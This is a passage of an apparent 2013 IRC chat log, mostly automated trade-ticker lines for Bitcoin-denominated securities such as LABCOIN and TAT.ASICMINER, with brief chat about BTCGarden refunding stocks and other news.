BTC [-] Aug 12 20:41:55 [HAVELOCK] [HIM] 1 @ 0.145 BTC [+] Aug 12 20:41:58 [HAVELOCK] [HIM] 1 @ 0.14599999 BTC [+] Aug 12 20:42:00 [HAVELOCK] [HIM] 1 @ 0.1469 BTC [+] Aug 12 20:42:02 [BTCTC] [LABCOIN] 1 @ 0.001554 BTC [+] Aug 12 20:42:12 [BTCTC] [LABCOIN] 30 @ 0.001535 = 0.0461 BTC [-] Aug 12 20:42:14 [BTCTC] [LABCOIN] 970 @ 0.001534 = 1.488 BTC [-] Aug 12 20:42:24 [HAVELOCK] [XBOND] 2 @ 0.0010454 = 0.0021 BTC [-] Aug 12 20:45:50 [BTCTC] [LABCOIN] 30 @ 0.001537 = 0.0461 BTC [+] Aug 12 20:45:51 [BTCTC] [LABCOIN] 20 @ 0.001536 = 0.0307 BTC [-] Aug 12 20:45:53 [BTCTC] [LABCOIN] 6243 @ 0.001534 = 9.5768 BTC [-] Aug 12 20:46:22 [BTCTC] [LABCOIN] 30 @ 0.001535 = 0.0461 BTC [+] Aug 12 20:46:23 [BTCTC] [LABCOIN] 20 @ 0.001534 = 0.0307 BTC [-] Aug 12 20:52:51 [BTCTC] [ACTIVEMINING] 30 @ 0.005701 = 0.171 BTC [-] Aug 12 20:52:53 [BTCTC] [ACTIVEMINING] 202 @ 0.0057 = 1.1514 BTC [-] Aug 12 20:53:19 [HAVELOCK] [CFIG] 9 @ 0.15 = 1.35 BTC Aug 12 20:54:17 [BTCTC] [ACTIVEMINING] 30 @ 0.005796 = 0.1739 BTC [+] Aug 12 20:59:52 [BTCTC] [LABCOIN] 30 @ 0.001502 = 0.0451 BTC [-] Aug 12 21:00:26 [BTCTC] [BASIC-MINING] 1 @ 0.3086 BTC [+] Aug 12 21:02:02 [BTCTC] [ACTIVEMINING] 25 @ 0.005683 = 0.1421 BTC [-] Aug 12 21:02:13 [HAVELOCK] [AM100] 10 @ 0.0388999 = 0.389 BTC [+] Aug 12 21:03:08 [BTCTC] [LABCOIN] 30 @ 0.001536 = 0.0461 BTC [+] Aug 12 21:03:10 [BTCTC] [LABCOIN] 1 @ 0.001537 BTC [+] Aug 12 21:03:10 [BTCTC] [LABCOIN] 1 @ 0.001542 BTC [+] Aug 12 21:03:11 [BTCTC] [LABCOIN] 20 @ 0.001543 = 0.0309 BTC [+] Aug 12 21:03:12 [BTCTC] [LABCOIN] 248 @ 0.001561 = 0.3871 BTC [+] Aug 12 21:04:11 [HAVELOCK] [AM100] 1 @ 0.0388 BTC [-] Aug 12 21:08:01 [MPEX] [S.MPOE] 1787 @ 0.00084871 = 1.5166 BTC [+] Aug 12 21:08:03 [MPEX] [S.MPOE] 3184 @ 0.00085017 = 2.7069 BTC [+] Aug 12 21:09:51 [MPEX] [S.MPOE] 1000 @ 0.00085017 = 0.8502 BTC [+] Aug 12 21:10:22 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC Aug 12 21:11:00 [BTCTC] [ASICMINER-PT] 1 @ 4.16 BTC [+] Aug 12 21:11:01 [BTCTC] [ASICMINER-PT] 1 @ 4.165 BTC [+] Aug 12 21:11:40 http://abcnews.go.com/US/wireStory/tenn-judge-childs-messiah-19931569 Aug 12 21:11:44 Tenn. Judge Changes Infant's Name From 'Messiah' - ABC News Aug 12 21:12:19 [BTCTC] [ACTIVEMINING] 30 @ 0.005768 = 0.173 BTC [+] Aug 12 21:13:07 Yeah saw that Aug 12 21:13:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.0409 = 0.0818 BTC [+] Aug 12 21:14:05 [HAVELOCK] [XBOND] 1 @ 0.0010454 BTC [-] Aug 12 21:14:13 [BTCTC] [ACTIVEMINING] 30 @ 0.005685 = 0.1706 BTC [-] Aug 12 21:14:34 [BTCTC] [ACTIVEMINING] 15 @ 0.005685 = 0.0853 BTC [-] Aug 12 21:14:43 [BTCTC] [ACTIVEMINING] 35 @ 0.005684 = 0.1989 BTC [-] Aug 12 21:14:55 [HAVELOCK] [AM100] 9 @ 0.0388 = 0.3492 BTC [-] Aug 12 21:16:53 [BTCTC] [ACTIVEMINING] 15 @ 0.005684 = 0.0853 BTC [-] Aug 12 21:17:34 [BTCTC] [ACTIVEMINING] 6 @ 0.005673 = 0.034 BTC [-] Aug 12 21:17:35 [BTCTC] [ACTIVEMINING] 11 @ 0.005672 = 0.0624 BTC [-] Aug 12 21:17:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.0408 = 0.1224 BTC [-] Aug 12 21:23:37 [BTCTC] [ACTIVEMINING] 30 @ 0.005779 = 0.1734 BTC [+] Aug 12 21:23:37 [BTCTC] [ACTIVEMINING] 86 @ 0.00578 = 0.4971 BTC [+] Aug 12 21:23:39 [BTCTC] [ACTIVEMINING] 50 @ 0.005781 = 0.2891 BTC [+] Aug 12 21:23:40 [BTCTC] [ACTIVEMINING] 91 @ 0.005783 = 0.5263 BTC [+] Aug 12 21:25:15 [BTCTC] [LABCOIN] 30 @ 0.001536 = 0.0461 BTC [-] Aug 12 21:25:22 [BTCTC] [LABCOIN] 3 @ 0.001537 = 0.0046 BTC [+] Aug 12 21:25:24 [BTCTC] [LABCOIN] 2 @ 0.001542 = 0.0031 BTC [+] Aug 12 21:25:29 [BTCTC] [LABCOIN] 20 @ 0.001543 = 0.0309 BTC [+] Aug 12 21:25:31 [BTCTC] [LABCOIN] 1 @ 0.00155 BTC [+] Aug 12 21:25:34 [BTCTC] [LABCOIN] 10 @ 0.001551 = 0.0155 BTC [+] Aug 12 21:25:36 [BTCTC] [LABCOIN] 250 @ 0.001561 = 0.3903 BTC [+] Aug 12 21:25:38 [BTCTC] [LABCOIN] 1 @ 0.001562 BTC [+] Aug 12 21:25:40 [HAVELOCK] [CFIG] 4 @ 0.15 = 0.6 BTC Aug 12 21:25:42 [BTCTC] [LABCOIN] 2000 @ 0.001563 = 3.126 BTC [+] Aug 12 21:26:10 [BTCTC] [LABCOIN] 20 @ 0.001562 = 0.0312 BTC [-] Aug 12 21:26:11 [BTCTC] [LABCOIN] 30 @ 0.001578 = 0.0473 BTC [+] Aug 12 21:26:13 [BTCTC] [LABCOIN] 187 @ 0.001579 = 0.2953 BTC [+] Aug 12 21:26:17 [BTCTC] [LABCOIN] 1480 @ 0.00158 = 2.3384 BTC [+] Aug 12 21:26:53 [BTCTC] [BITVPS] 1 @ 0.002097 BTC [+] Aug 12 21:27:17 [BTCTC] [ACTIVEMINING] 30 @ 0.005769 = 0.1731 BTC [-] Aug 12 21:27:22 [BTCTC] [ACTIVEMINING] 88 @ 0.00577 = 0.5078 BTC [+] Aug 12 21:27:24 [BTCTC] [ACTIVEMINING] 64 @ 0.005779 = 0.3699 BTC [+] Aug 12 21:27:27 [BTCTC] [ACTIVEMINING] 290 @ 0.005783 = 1.6771 BTC [+] Aug 12 21:27:28 [BTCTC] [ACTIVEMINING] 80 @ 0.005789 = 0.4631 BTC [+] Aug 12 21:27:28 [BTCTC] [ACTIVEMINING] 400 @ 0.00579 = 2.316 BTC [+] Aug 12 21:27:36 [BTCTC] [TAT.ASICMINER] 53 @ 0.0408 = 2.1624 BTC [-] Aug 12 21:27:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.0409 = 0.0818 BTC [+] Aug 12 21:27:41 [BTCTC] [TAT.ASICMINER] 16 @ 0.0409 = 0.6544 BTC [+] Aug 12 21:27:42 "child support magistrate" ? Aug 12 21:27:45 [BTCTC] [TAT.ASICMINER] 8 @ 0.04095 = 0.3276 BTC [+] Aug 12 21:27:46 what the dfuck is that lmao Aug 12 21:27:50 [BTCTC] [TAT.ASICMINER] 21 @ 0.04095 = 0.86 BTC [+] Aug 12 21:28:16 http://bcoinnews.com/2013/08/12/btcgarden-repayment/ Aug 12 21:28:22 [BTCTC] [LABCOIN] 30 @ 0.00156 = 0.0468 BTC [-] Aug 12 21:28:26 [BTCTC] [LABCOIN] 20 @ 0.00158 = 0.0316 BTC [+] Aug 12 21:28:31 [BTCTC] [LABCOIN] 3 @ 0.00159 = 0.0048 BTC [+] Aug 12 21:28:35 [BTCTC] [LABCOIN] 30 @ 0.001591 = 0.0477 BTC [+] Aug 12 21:28:40 and looky they got bulger. Aug 12 21:28:45 aged what, 80 by now ? 90 ? Aug 12 21:28:53 [BTCTC] [LABCOIN] 125 @ 0.001598 = 0.1998 BTC [+] Aug 12 21:28:54 [BTCTC] [LABCOIN] 1000 @ 0.001599 = 1.599 BTC [+] Aug 12 21:28:57 [BTCTC] [LABCOIN] 3 @ 0.001604 = 0.0048 BTC [+] Aug 12 21:28:58 with 19 murders right Aug 12 21:29:02 [BTCTC] [LABCOIN] 25 @ 0.001605 = 0.0401 BTC [+] Aug 12 21:29:04 [BTCTC] [LABCOIN] 25 @ 0.001629 = 0.0407 BTC [+] Aug 12 21:29:08 [BTCTC] [LABCOIN] 200 @ 0.00163 = 0.326 BTC [+] Aug 12 21:29:09 i doubt anyone knows by now Aug 12 21:29:11 [BTCTC] [LABCOIN] 1752 @ 0.001644 = 2.8803 BTC [+] Aug 12 21:29:12 [BTCTC] [ASICMINER-PT] 4 @ 4.171 = 16.684 BTC [+] Aug 12 21:29:20 [BTCTC] [LABCOIN] 1817 @ 0.001645 = 2.989 BTC [+] Aug 12 21:29:22 I mean I think that's what they're getting him with Aug 12 21:29:38 [BTCTC] [LABCOIN] 3 @ 0.00156 = 0.0047 BTC [-] Aug 12 21:29:40 [BTCTC] [ASICMINER-PT] 3 @ 4.172 = 12.516 BTC [+] Aug 12 21:29:52 a. somwething like that ya Aug 12 21:30:10 [BTCTC] [BASIC-MINING] 3 @ 0.3086 = 0.9258 BTC [+] Aug 12 21:30:18 [BTCTC] [TAT.ASICMINER] 19 @ 0.04095 = 0.7781 BTC [+] Aug 12 21:30:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.041 = 0.082 BTC [+] Aug 12 21:30:22 [BTCTC] [TAT.ASICMINER] 50 @ 0.041 = 2.05 BTC [+] Aug 12 21:30:23 [BTCTC] [LABCOIN] 30 @ 0.001578 = 0.0473 BTC [+] Aug 12 21:30:24 Damn they did it Aug 12 21:30:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.0412 = 0.0824 BTC [+] Aug 12 21:30:27 [BTCTC] [LABCOIN] 2 @ 0.001579 = 0.0032 BTC [+] Aug 12 21:30:31 [BTCTC] [TAT.ASICMINER] 25 @ 0.0412 = 1.03 BTC [+] Aug 12 21:30:34 [BTCTC] [LABCOIN] 12168 @ 0.001645 = 20.0164 BTC [+] Aug 12 21:30:42 [BTCTC] [TAT.ASICMINER] 25 @ 0.0413 = 1.0325 BTC [+] Aug 12 21:30:51 That's pretty cool, too bad they ~had~ to shut down. Aug 12 21:30:59 [BTCTC] [LABCOIN] 30 @ 0.001643 = 0.0493 BTC [-] Aug 12 21:31:14 [BTCTC] [LABCOIN] 168 @ 0.001644 = 0.2762 BTC [+] Aug 12 21:31:17 [BTCTC] [ASICMINER-PT] 2 @ 4.172 = 8.344 BTC [+] Aug 12 21:31:54 [BTCTC] [LABCOIN] 30 @ 0.001643 = 0.0493 BTC [-] Aug 12 21:32:00 [BTCTC] [LABCOIN] 20 @ 0.001643 = 0.0329 BTC [-] Aug 12 21:32:02 [BTCTC] [LABCOIN] 469 @ 0.001644 = 0.771 BTC [+] Aug 12 21:32:04 [BTCTC] [LABCOIN] 32 @ 0.001645 = 0.0526 BTC [+] Aug 12 21:32:06 [BTCTC] [LABCOIN] 18 @ 0.001648 = 0.0297 BTC [+] Aug 12 21:32:13 are the funds flwoing back in? Aug 12 21:32:14 [BTCTC] [LABCOIN] 30 @ 0.001642 = 0.0493 BTC [-] Aug 12 21:32:15 mircea_popescu: garden bet resolved Aug 12 21:32:18 lotta action all of a sudden? Aug 12 21:32:21 [BTCTC] [LABCOIN] 20 @ 0.001648 = 0.033 BTC [+] Aug 12 21:32:23 [BTCTC] [LABCOIN] 1000 @ 0.001649 = 1.649 BTC [+] Aug 12 21:32:24 [BTCTC] [LABCOIN] 950 @ 0.001649 = 1.5666 BTC [+] Aug 12 21:32:30 Btc-g refunded the stocks Aug 12 21:32:31 [BTCTC] [LABCOIN] 30 @ 0.001648 = 0.0494 BTC [-] Aug 12 21:32:33 [BTCTC] [LABCOIN] 1553 @ 0.001649 = 2.5609 BTC [+] Aug 12 21:32:38 [HAVELOCK] [AM100] 1 @ 0.0388 BTC [-] Aug 12 21:32:40 [BTCTC] [ASICMINER-PT] 1 @ 4.172 BTC [+] Aug 12 21:32:41 [BTCTC] [LABCOIN] 2780 @ 0.00165 = 4.587 BTC [+] Aug 12 21:32:49 [BTCTC] [LABCOIN] 250 @ 0.00165 = 0.4125 BTC [+] Aug 12 21:32:56 [BTCTC] [LABCOIN] 7250 @ 0.00165 = 11.9625 BTC [+] Aug 12 21:33:08 [BTCTC] [LABCOIN] 2158 @ 0.00165 = 3.5607 BTC [+] Aug 12 21:33:10 [BTCTC] [ASICMINER-PT] 1 @ 4.172 BTC [+] Aug 12 21:33:15 [BTCTC] [LABCOIN] 7592 @ 0.00165 = 12.5268 BTC [+] Aug 12 21:33:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.0417 = 0.0834 BTC [+] Aug 12 21:33:33 [BTCTC] [ACTIVEMINING] 30 @ 0.005782 = 0.1735 BTC [-] Aug 12 21:33:34 [BTCTC] [ACTIVEMINING] 27 @ 0.005783 = 0.1561 BTC [+] Aug 12 21:33:35 [BTCTC] [TAT.ASICMINER] 13 @ 0.0417 = 0.5421 BTC [+] Aug 12 21:33:36 [BTCTC] [ACTIVEMINING] 50 @ 0.005783 = 0.2892 BTC [+] Aug 12 21:33:40 [BTCTC] [ACTIVEMINING] 27 @ 0.005788 = 0.1563 BTC [+] Aug 12 21:33:44 [BTCTC] [ACTIVEMINING] 9 @ 0.005793 = 0.0521 BTC [+] Aug 12 21:33:47 [BTCTC] [ACTIVEMINING] 475 @ 0.005799 = 2.7545 BTC [+] Aug 12 21:33:55 [BTCTC] [ACTIVEMINING] 15 @ 0.005782 = 0.0867 BTC [-] Aug 12 21:34:10 [BTCTC] [LABCOIN] 20 @ 0.00167 = 0.0334 BTC [+] Aug 12 21:34:10 here comes the moneey Aug 12 21:34:18 [BTCTC] [LABCOIN] 20 @ 0.001671 = 0.0334 BTC [+] Aug 12 21:34:19 [BTCTC] [ACTIVEMINING] 450 @ 0.0058 = 2.61 BTC [+] Aug 12 21:34:21 [BTCTC] [LABCOIN] 80 @ 0.001683 = 0.1346 BTC [+] Aug 12 21:34:22 [BTCTC] [ACTIVEMINING] 4 @ 0.005811 = 0.0232 BTC [+] Aug 12 21:34:24 [BTCTC] [LABCOIN] 300 @ 0.00169 = 0.507 BTC [+] Aug 12 21:34:26 [BTCTC] [ACTIVEMINING] 20 @ 0.005812 = 0.1162 BTC [+] Aug 12 21:34:28 [BTCTC] [LABCOIN] 9 @ 0.00171 = 0.0154 BTC [+] Aug 12 21:34:29 [BTCTC] [ACTIVEMINING] 111 @ 0.005824 = 0.6465 BTC [+] Aug 12 21:34:30 [BTCTC] [LABCOIN] 50 @ 0.00171 = 0.0855 BTC [+] Aug 12 21:34:34 [BTCTC] [LABCOIN] 40 @ 0.00173 = 0.0692 BTC [+] Aug 12 21:34:34 [BTCTC] [LABCOIN] 230 @ 0.001737 = 0.3995 BTC [+] Aug 12 21:34:38 [BTCTC] [LABCOIN] 1000 @ 0.001744 = 1.744 BTC [+] Aug 12 21:34:44 [BTCTC] [CRYPTO-TRADE] 4 @ 0.1999 = 0.7996 BTC [-] Aug 12 21:34:45 dexX7 blockchain helps for sure. Aug 12 21:35:02 ?? Aug 12 21:35:32 [BTCTC] [LABCOIN] 30 @ 0.001744 = 0.0523 BTC [+] Aug 12 21:35:32 [BTCTC] [LABCOIN] 537 @ 0.001745 = 0.9371 BTC [+] Aug 12 21:35:32 [BTCTC] [LABCOIN] 450 @ 0.001745 = 0.7853 BTC [+] Aug 12 21:35:37 [BTCTC] [LABCOIN] 245 @ 0.001749 = 0.4285 BTC [+] Aug 12 21:35:46 [BTCTC] [TAT.ASICMINER] 8 @ 0.0417 = 0.3336 BTC [+] Aug 12 21:35:47 [BTCTC] [LABCOIN] 4168 @ 0.00175 = 7.294 BTC [+] Aug 12 21:35:48 [BTCTC] [ACTIVEMINING] 15 @ 0.005782 = 0.0867 BTC [-] Aug 12 21:36:03 AND FROM THE BLOOD OF THE GARDEN THE LAB IS REDEEMED! PRAIZE BITCOINSUS!!! Aug 12 21:36:18 [BTCTC] [LABCOIN] 3077 @ 0.00175 = 5.3848 BTC [+] Aug 12 21:36:20 [BTCTC] [LABCOIN] 827 @ 0.00175 = 1.4473 BTC [+] Aug 12 21:36:22 [BTCTC] [LABCOIN] 10 @ 0.00176 = 0.0176 BTC [+] Aug 12 21:36:24 [BTCTC] [LABCOIN] 10 @ 0.00177 = 0.0177 BTC [+] Aug 12 21:36:26 [BTCTC] [LABCOIN] 150 @ 0.00178 = 0.267 BTC [+] Aug 12 21:36:29 [BTCTC] [LABCOIN] 350 @ 0.00178 = 0.623 BTC [+] Aug 12 21:36:30 [BTCTC] [LABCOIN] 100 @ 0.001784 = 0.1784 BTC [+] Aug 12 21:36:32 [BTCTC] [LABCOIN] 2249 @ 0.001789 = 4.0235 BTC [+] Aug 12 21:36:33 [BTCTC] [LABCOIN] 1455 @ 0.00179 = 2.6045 BTC [+] Aug 12 21:36:34 [BTCTC] [LABCOIN] 10 @ 0.00179 = 0.0179 BTC [+] Aug 12 21:36:35 [BTCTC] [LABCOIN] 50 @ 0.00179 = 0.0895 BTC [+] Aug 12 21:36:35 [BTCTC] [LABCOIN] 300 @ 0.00179 = 0.537 BTC [+] Aug 12 21:36:36 [BTCTC] [LABCOIN] 8000 @ 0.001798 = 14.384 BTC [+] Aug 12 21:36:37 [BTCTC] [LABCOIN] 2000 @ 0.001799 = 3.598 BTC [+] Aug 12 21:36:38 [BTCTC] [LABCOIN] 5000 @ 0.0018 = 9 BTC [+] Aug 12 21:36:39 [BTCTC] [LABCOIN] 4912 @ 0.0018 = 8.8416 BTC [+] Aug 12 21:36:45 [BTCTC] [LABCOIN] 30 @ 0.001784 = 0.0535 BTC [-] Aug 12 21:36:47 [BTCTC] [BASIC-MINING] 1 @ 0.31 BTC [+] Aug 12 21:36:48 [BTCTC] [BASIC-MINING] 3 @ 0.31 = 0.93 BTC [+] Aug 12 21:36:49 [BTCTC] [ACTIVEMINING] 30 @ 0.005675 = 0.1703 BTC [-] Aug 12 21:37:01 [BTCTC] [TAT.ASICMINER] 4 @ 0.0417 = 0.1668 BTC [+] Aug 12 21:37:01 [BTCTC] [TAT.ASICMINER] 29 @ 0.0417 = 1.2093 BTC [+] Aug 12 21:37:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.04174 = 0.4174 BTC [+] Aug 12 21:37:04 [BTCTC] [PAJKA.BOND] 1 @ 0.015 BTC [-] Aug 12 21:37:05 [BTCTC] [TAT.ASICMINER] 47 @ 0.04175 = 1.9623 BTC [+] Aug 12 21:37:12 [BTCTC] [LABCOIN] 30 @ 0.001799 = 0.054 BTC [+] Aug 12 21:37:13 [BTCTC] [LABCOIN] 2000 @ 0.0018 = 3.6 BTC [+] Aug 12 21:37:15 [BTCTC] [LABCOIN] 970 @ 0.0018 = 1.746 BTC [+] Aug 12 21:37:27 [BTCTC] [BASIC-MINING] 4 @ 0.3206 = 1.2824 BTC [+] Aug 12 21:37:38 [BTCTC] [LABCOIN] 30 @ 0.001799 = 0.054 BTC [-] Aug 12 21:37:39 [BTCTC] [LABCOIN] 118 @ 0.0018 = 0.2124 BTC [+] Aug 12 21:38:01 [BTCTC] [BASIC-MINING] 1 @ 0.3207 BTC [+] Aug 12 21:38:14 [BTCTC] [LABCOIN] 800 @ 0.00181 = 1.448 BTC [+] Aug 12 21:38:15 [BTCTC] [LABCOIN] 420 @ 0.001815 = 0.7623 BTC [+] Aug 12 21:38:16 [BTCTC] [LABCOIN] 360 @ 0.001817 = 0.6541 BTC [+] Aug 12 21:38:17 [BTCTC] [LABCOIN] 420 @ 0.001817 = 0.7631 BTC [+] Aug 12 21:38:19 [BTCTC] [LABCOIN] 1220 @ 0.001817 = 2.2167 BTC [+] Aug 12 21:38:20 [BTCTC] [ACTIVEMINING] 30 @ 0.005821 = 0.1746 BTC [+] Aug 12 21:38:21 [BTCTC] [LABCOIN] 1874 @ 0.00182 = 3.4107 BTC [+] Aug 12 21:38:22 [BTCTC] [ACTIVEMINING] 117 @ 0.005822 = 0.6812 BTC [+] Aug 12 21:38:23 [BTCTC] [LABCOIN] 30 @ 0.001821 = 0.0546 BTC [+] Aug 12 21:38:24 [BTCTC] [LABCOIN] 876 @ 0.001831 = 1.604 BTC [+] Aug 12 21:38:24 [BTCTC] [ACTIVEMINING] 53 @ 0.005825 = 0.3087 BTC [+] Aug 12 21:38:26 [HAVELOCK] [XBOND] 510 @ 0.0010454 = 0.5332 BTC [-] Aug 12 21:38:28 [HAVELOCK] [XBOND] 693 @ 0.00104628 = 0.7251 BTC [+] Aug 12 21:38:30 [BTCTC] [DMS.MINING] 1 @ 0.00365 BTC [+] Aug 12 21:38:31 [HAVELOCK] [XBOND] 1297 @ 0.00104629 = 1.357 BTC [+] Aug 12 21:38:33 [BTCTC] [TAT.ASICMINER] 34 @ 0.04175 = 1.4195 BTC [+] Aug 12 21:38:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.04189 = 0.4189 BTC [+] Aug 12 21:38:35 [BTCTC] [TAT.ASICMINER] 62 @ 0.0419 = 2.5978 BTC [+] Aug 12 21:38:36 [BTCTC] [TAT.ASICMINER] 23 @ 0.0419 = 0.9637 BTC [+] Aug 12 21:38:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.04191 = 0.2096 BTC [+] Aug 12 21:38:38 [BTCTC] [TAT.ASICMINER] 36 @ 0.04192 = 1.5091 BTC [+] Aug 12 21:38:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.04192 = 0.4192 BTC [+] Aug 12 21:38:40 [BTCTC] [TAT.ASICMINER] 18 @ 0.04192 = 0.7546 BTC [+] Aug 12 21:38:41 [BTCTC] [TAT.ASICMINER] 33 @ 0.04194 = 1.384 BTC [+] Aug 12 21:38:42 [BTCTC] [TAT.ASICMINER] 40 @ 0.042 = 1.68 BTC [+] Aug 12 21:38:43 [BTCTC] [TAT.ASICMINER] 50 @ 0.042 = 2.1 BTC [+] Aug 12 21:38:44 [BTCTC] [TAT.ASICMINER] 200 @ 0.042 = 8.4 BTC [+] Aug 12 21:39:07 [BTCTC] [ASICMINER-PT] 1 @ 4.172 BTC [+] Aug 12 21:39:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.04225 BTC [+] Aug 12 21:39:24 [BTCTC] [LABCOIN] 30 @ 0.00183 = 0.0549 BTC [-] Aug 12 21:39:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.04225 BTC [+] Aug 12 21:39:26 [BTCTC] [LABCOIN] 459 @ 0.001831 = 0.8404 BTC [+] Aug 12 21:39:27 [BTCTC] [TAT.ASICMINER] 60 @ 0.0428 = 2.568 BTC [+] Aug 12 21:39:28 [BTCTC] [LABCOIN] 25 @ 0.00184 = 0.046 BTC [+] Aug 12 21:39:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.0428 = 0.0856 BTC [+] Aug 12 21:39:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.0428 = 0.214 BTC [+] Aug 12 21:39:32 [BTCTC] [ACTIVEMINING] 1661 @ 0.00582 = 9.667 BTC [-] Aug 12 21:39:33 [BTCTC] [ASICMINER-PT] 1 @ 4.173 BTC [+] Aug 12 21:39:53 Well time for a smoke Aug 12 21:39:56 [BTCTC] [ACTIVEMINING] 502 @ 0.005825 = 2.9242 BTC [+] Aug 12 21:40:21 [BTCTC] [ASICMINER-PT] 4 @ 4.174 = 16.696 BTC [+] Aug 12 21:40:22 [BTCTC] [LABCOIN] 25 @ 0.0015 = 0.0375 BTC [-] Aug 12 21:40:24 [BTCTC] [LABCOIN] 200 @ 0.00184 = 0.368 BTC [+] Aug 12 21:40:38 [BTCTC] [LABCOIN] 30 @ 0.001839 = 0.0552 BTC [-] Aug 12 21:40:40 [BTCTC] [LABCOIN] 129 @ 0.00184 = 0.2374 BTC [+] Aug 12 21:40:42 [BTCTC] [LABCOIN] 31 @ 0.00184 = 0.057 BTC [+] Aug 12 21:40:43 [BTCTC] [LABCOIN] 869 @ 0.001845 = 1.6033 BTC [+] Aug 12 21:40:45 BTCGarden refunds back. Aug 12 21:40:52 No shit? Aug 12 21:40:57 lol Aug 12 21:40:58 it's like money raining from heaven Aug 12 21:41:01 :P Aug 12 21:41:01 [BTCTC] [LABCOIN] 8 @ 0.001831 = 0.0146 BTC [-] Aug 12 21:41:08 I can dig this kind of rain Aug 12 21:41:09 [BTCTC] [ACTIVEMINING] 1 @ 0.005845 BTC [+] Aug 12 21:41:14 [BTCTC] [LABCOIN] 30 @ 0.00183 = 0.0549 BTC [-] Aug 12 21:41:16 [BTCTC] [DMS.PURCHASE] 8 @ 0.02801 = 0.2241 BTC [-] Aug 12 21:41:21 [BTCTC] [LABCOIN] 1005 @ 0.001845 = 1.8542 BTC [+] Aug 12 21:41:22 [BTCTC] [TAT.ASICMINER] 73 @ 0.0429 = 3.1317 BTC [+] Aug 12 21:41:23 [BTCTC] [TAT.ASICMINER] 140 @ 0.0429 = 6.006 BTC [+] Aug 12 21:41:24 [BTCTC] [LABCOIN] 1750 @ 0.001848 = 3.234 BTC [+] Aug 12 21:41:25 [BTCTC] [LABCOIN] 10 @ 0.001849 = 0.0185 BTC [+] Aug 12 21:41:26 [BTCTC] [LABCOIN] 100 @ 0.001849 = 0.1849 BTC [+] Aug 12 21:41:28 [BTCTC] [LABCOIN] 5000 @ 0.00185 = 9.25 BTC [+] Aug 12 21:41:37 [BTCTC] [LABCOIN] 1000 @ 0.001887 = 1.887 BTC [+] Aug 12 21:41:38 [BTCTC] [DMS.MINING] 3 @ 0.00365 = 0.011 BTC [+] Aug 12 21:41:39 [BTCTC] [LABCOIN] 370 @ 0.001889 = 0.6989 BTC [+] Aug 12 21:41:42 [BTCTC] [LABCOIN] 1000 @ 0.001899 = 1.899 BTC [+] Aug 12 21:41:43 [BTCTC] [LABCOIN] 4000 @ 0.001899 = 7.596 BTC [+] Aug 12 21:41:44 [BTCTC] [LABCOIN] 590 @ 0.0019 = 1.121 BTC [+] Aug 12 21:41:45 [BTCTC] [LABCOIN] 2060 @ 0.0019 = 3.914 BTC [+] Aug 12 21:41:46 [BTCTC] [LABCOIN] 980 @ 0.0019 = 1.862 BTC [+] Aug 12 21:41:48 [BTCTC] [LABCOIN] 135 @ 0.00185 = 0.2498 BTC [-] Aug 12 21:41:49 [BTCTC] [LABCOIN] 305 @ 0.001799 = 0.5487 BTC [-] Aug 12 21:41:52 [BTCTC] [LABCOIN] 15 @ 0.001886 = 0.0283 BTC [+] Aug 12 21:41:55 [BTCTC] [DMS.MINING] 13 @ 0.00365 = 0.0475 BTC [+] Aug 12 21:42:16 [BTCTC] [ACTIVEMINING] 10 @ 0.005844 = 0.0584 BTC [-] Aug 12 21:42:24 And now the wall Aug 12 21:42:35 [BTCTC] [BTC-BOND] 13 @ 0.009999 = 0.13 BTC [+] Aug 12 21:42:57 [BTCTC] [LABCOIN] 5 @ 0.001891 = 0.0095 BTC [+] Aug 12 21:42:58 [BTCTC] [ACTIVEMINING] 15 @ 0.005844 = 0.0877 BTC [-] Aug 12 21:43:09 [BTCTC] [LABCOIN] 295 @ 0.001891 = 0.5578 BTC [+] Aug 12 21:43:15 [BTCTC] [LABCOIN] 451 @ 0.001899 = 0.8564 BTC [+] Aug 12 21:43:17 [BTCTC] [LABCOIN] 4020 @ 0.0019 = 7.638 BTC [+] Aug 12 21:43:19 [BTCTC] [LABCOIN] 234 @ 0.0019 = 0.4446 BTC [+] Aug 12 21:43:22 [BTCTC] [ASICMINER-PT] 1 @ 4.176 BTC [+] Aug 12 21:43:23 [BTCTC] [ACTIVEMINING] 45 @ 0.005844 = 0.263 BTC [-] Aug 12 21:43:24 [BTCTC] [LABCOIN] 1824 @ 0.001899 = 3.4638 BTC [-] Aug 12 21:43:26 [BTCTC] [LABCOIN] 1845 @ 0.0019 = 3.5055 BTC [+] Aug 12 21:43:27 [BTCTC] [ACTIVEMINING] 219 @ 0.005845 = 1.2801 BTC [+] Aug 12 21:43:28 [BTCTC] [LABCOIN] 16331 @ 0.0019 = 31.0289 BTC [+] Aug 12 21:43:29 [BTCTC] [ACTIVEMINING] 55 @ 0.005847 = 0.3216 BTC [+] Aug 12 21:43:29 [BTCTC] [ACTIVEMINING] 50 @ 0.005848 = 0.2924 BTC [+] Aug 12 21:43:30 [BTCTC] [ACTIVEMINING] 50 @ 0.005849 = 0.2925 BTC [+] Aug 12 21:43:31 [BTCTC] [ACTIVEMINING] 41 @ 0.005898 = 0.2418 BTC [+] Aug 12 21:43:33 [BTCTC] [ACTIVEMINING] 40 @ 0.005899 = 0.236 BTC [+] Aug 12 21:43:34 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001478 BTC [-] Aug 12 21:43:41 [BTCTC] [LABCOIN] 35 @ 0.0019 = 0.0665 BTC [+] Aug 12 21:43:54 [BTCTC] [BITVPS] 250 @ 0.002098 = 0.5245 BTC [+] Aug 12 21:43:55 [BTCTC] [BITVPS] 250 @ 0.002099 = 0.5248 BTC [+] Aug 12 21:43:57 [BTCTC] [BITVPS] 500 @ 0.0021 = 1.05 BTC [+] Aug 12 21:43:58 [BTCTC] [BITVPS] 7 @ 0.002135 = 0.0149 BTC [+] Aug 12 21:43:58 [BTCTC] [BITVPS] 3 @ 0.002208 = 0.0066 BTC [+] Aug 